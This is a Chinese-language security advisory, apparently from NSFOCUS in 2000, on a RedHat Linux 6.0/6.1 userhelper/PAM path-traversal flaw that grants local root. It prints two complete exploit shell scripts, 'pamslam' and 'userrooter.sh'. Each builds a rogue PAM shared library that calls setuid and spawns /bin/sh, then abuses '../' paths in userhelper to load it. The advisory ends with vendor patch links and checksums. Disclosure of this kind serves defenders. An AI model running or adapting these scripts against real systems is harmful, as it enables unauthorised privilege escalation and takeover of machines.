首页 -> 安全研究
安全研究
安全漏洞
RedHat userhelper/PAM安全漏洞
发布日期:2000-01-06
更新日期:2000-01-06
受影响系统:
RedHat Linux 6.1描述:
RedHat Linux 6.0
RedHat 6.0和6.1系统中缺省安装的userhelper和PAM允许使用包含".."的路径名,并且
userhelper被设置了suid root位.因此本地用户可能获得root权限.
userhleper允许你通过"-w"参数指定一个要运行的程序,这些程序需要在
/etc/security/console.apps目录里有一个对应文件.因此,通过指定类似"../../../
tmp/myprog"的程序名,攻击者可以利用userhelper去执行
"/etc/security/console.apps/../../../tmp/myprog",也就是执行"/tmp/myprog".
如果"/tmp/myprog"已经存在,PAM将会试图执行它,PAM首先检查是否/etc/pam.d中有"../../
tmp/myprog"相应的配置文件,如果有,PAM将以root身份去打开相应的共享库.但不幸的是PAM
也允许使用包含".."的路径名,因此攻击者可以提供一个伪造的PAM配置文件,里面包含一个
任意的共享库名(这个共享库是由攻击者创建的),当PAM试图用dlopen()来打开这个共享库时,
攻击者就可以获取root权限.
<* 来源: dildog@l0pht.com (L0pht)
相关链接: http://www.l0pht.com/advisories.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
#
# synopsis:
# both 'pam' and 'userhelper' (a setuid binary that comes with the
# 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
# _pam_add_handler(), we can get it to dlopen any file on disk.
'userhelper'
# being setuid means we can get root.
#
# fix:
# No fuckin idea for a good fix. Get rid of the .. paths in userhelper
# for a quick fix. Remember 'strcat' isn't a very good way of confining
# a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system("/bin/sh");
}
EOF
echo -n .
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf
---------------------------- exploit 2 -------------------------------------------
#!/bin/sh
# userrooter.sh by S <super@innu.org>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
then echo "Machine doesn't appear to be vulnerable :-\\"
echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>
void pam_sm_authenticate(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
void pam_sm_setcred(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
EOF
cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF
gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login
建议:
RedHat 已经提供了相应的补丁:
Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
MD5 sum Package Name
bffd4388103fa99265e267eab7ae18c8 i386/pam-0.68-10.i386.rpm
2d69859d2b1d2180d254fc263bdccf94 i386/usermode-1.17-1.i386.rpm
fed2c2ad4f95829e14727a9dfceaca07 alpha/pam-0.68-10.alpha.rpm
83c69cb92b16bb0eef295acb4c857657 alpha/usermode-1.17-1.alpha.rpm
350662253d09b17d0aca4e9c7a511675 sparc/pam-0.68-10.sparc.rpm
d89495957c9a438fda657b8a4a5f5578 sparc/usermode-1.17-1.sparc.rpm
f9ad800f56b7bb05ce595bad824a990d SRPMS/pam-0.68-10.src.rpm
1d3b367d257a57de7d834043a4fcd87a SRPMS/usermode-1.17-1.src.rpm
浏览次数:7063
严重程度:0(网友投票)
绿盟科技给您安全的保障